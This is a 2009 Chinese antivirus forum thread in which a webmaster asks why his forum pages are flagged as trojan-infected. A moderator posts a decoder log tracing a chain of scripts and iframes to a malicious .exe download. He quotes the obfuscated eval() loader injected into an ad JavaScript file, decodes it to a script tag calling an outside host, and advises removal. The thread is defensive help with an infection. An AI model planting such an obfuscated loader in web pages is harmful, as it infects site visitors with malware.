瑞星卡卡安全论坛技术交流区恶意网站交流瑞星云安全网站联盟专版 网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

1   1  /  1  页   跳转

网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

收藏
小椴
头像
初生襁褓狮
  • 帖子:10
  • 注册: 2009-10-31
  • 来自:
发表于: 2009-12-31 15:04 | 只看楼主 短消息 资料
字号: 1楼

网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

网页:http://www.xiugoo.com/bbs/thread-306912-1-1.html
检测时间:2009-12-31 14:16:020
木马网址:
http://infi.8800.org/data/backup/yx
shellcode溢出攻击
解决方案



网页:http://www.xiugoo.com/bbs/thread-805670-1-1.html
检测时间:2009-12-31 14:15:59
木马网址:
http://infi.8800.org/data/backup/yx
shellcode溢出攻击
解决方案



网页:http://www.xiugoo.com/bbs/thread-406072-1-1.html
检测时间:2009-12-31 14:15:54
木马网址:
http://infi.8800.org/data/backup/yx
shellcode溢出攻击
解决方案



网页:http://www.xiugoo.com/bbs/thread-784378-1-1.html
检测时间:2009-12-31 14:15:55
木马网址:
http://infi.8800.org/data/backup/yx
shellcode溢出攻击
解决方案



网页:http://www.xiugoo.com/bbs/thread-856716-1-1.html
检测时间:2009-12-31 13:45:12
木马网址:
http://infi.8800.org/data/backup/yx

用户系统信息:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)
最后编辑networkedition 最后编辑于 2009-12-31 15:08:02
分享到:
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-12-31 15:08 | 短消息 资料
字号: 2楼

回复 1F 小椴 的帖子

是被挂马了。
Log generated by networkedition use mdecoder 0.30
[root]http://www.xiugoo.com/bbs/thread-306912-1-1.html
    [script]http://www.xiugoo.com/bbs/include/js/common.js?2n3
    [script]http://cpro.baidu.com/cpro/ui/cp.js
    [script]http://www.xiugoo.com/bbs/include/js/viewthread.js?2n3
    [script]http://cpro.baidu.com/cpro/ui/cp.js
    [script]http://cpro.baidu.com/cpro/ui/cp.js
    [script]http://www.xiugoo.com/bbs/include/js/checkurl.js?2n3
    [script]http://www.xiugoo.com/bbs/ad-xg/ad-js/ad_qqxxxx.js
        [script]http://ad.googlesyndications.co.cc/data/backup/yx/images.png?sxs
            [iframe]http://infi.8800.org/data/backup/yx/data.htm?12
                [exe]http://ad.googlesyndications.co.cc/data/r1.exe
    [script]http://u.1133.cc/showpage.php?pid=136091&show_t=2
    [script]http://u.1133.cc/showpage.php?pid=130136&show_t=2
    [script]http://u.1133.cc/showpage.php?pid=130137&show_t=2
        [script]http://code06js.1133.cc/pds_k/pagejs/webgroup130137.js
gototop
 
小椴
头像
初生襁褓狮
  • 帖子:10
  • 注册: 2009-10-31
  • 来自:
发表于: 2009-12-31 15:09 | 只看楼主 短消息 资料
字号: 3楼

回复:网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

是哪个文件被挂马呢! 找不到!!!
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-12-31 15:11 | 短消息 资料
字号: 4楼

回复: 网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

http://www.xiugoo.com/bbs/ad-xg/ad-js/ad_qqxxxx.js
这个js里面有个eval

[复制到剪贴板]
CODE:
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('5.6(\'<0 4=3://1.2.7.8/e/d/c/b.9?a></0>\');',15,15,'script|ad|googlesyndications|http|src|document|write|co|cc|png|sxs|images|yx|backup|data'.split('|'),0,{}));}
gototop
 
小椴
头像
初生襁褓狮
  • 帖子:10
  • 注册: 2009-10-31
  • 来自:
发表于: 2009-12-31 15:17 | 只看楼主 短消息 资料
字号: 5楼

回复:网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

网站里面的 这个文件 和 下载的 文件 明明不一样! 怎么会呢??
gototop
 
小椴
头像
初生襁褓狮
  • 帖子:10
  • 注册: 2009-10-31
  • 来自:
发表于: 2009-12-31 15:19 | 只看楼主 短消息 资料
字号: 6楼

回复:网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

有什么办法可以查 这个文件是怎么被修改的吗?
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-12-31 15:31 | 短消息 资料
字号: 7楼

回复 5F 小椴 的帖子

那个是被加密呀,你删除整个那段代码呀
eval解密出是这个:
<script src=http://ad.googlesyndications.co.cc/data/backup/yx/images.png?sxs></script>;;}
gototop
 
小椴
头像
初生襁褓狮
  • 帖子:10
  • 注册: 2009-10-31
  • 来自:
发表于: 2009-12-31 16:00 | 只看楼主 短消息 资料
字号: 8楼

回复:网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

恩 奇怪的事情是 这个文件 不知道是怎么来的 有什么办法 查文件是如何来的吗? 要不然 后门也找不到!
gototop
 
networkedition
头像
社区嘉宾
  • 帖子:36698
  • 注册: 2008-02-28
  • 来自:
论坛8周年活动礼物09欢乐圣诞10温馨圣诞
发表于: 2009-12-31 16:43 | 短消息 资料
字号: 9楼

回复 8F 小椴 的帖子

服务器有漏洞了吧,自行检查吧,还有就是查看一下网站的页面代码是否有漏洞之类的。
gototop
 
飞舟
头像
初生襁褓狮
  • 帖子:8
  • 注册: 2009-09-03
  • 来自:
发表于: 2010-01-04 00:01 | 短消息 资料
字号: 10楼

回复:网站提示有木马 检查不到 挂马文件 斑竹帮忙看看

看修改日期。一般是js文件被修改
gototop
 
<<上一主题|下一主题>>
1   1  /  1  页   跳转
页面顶部
Powered by Discuz!NT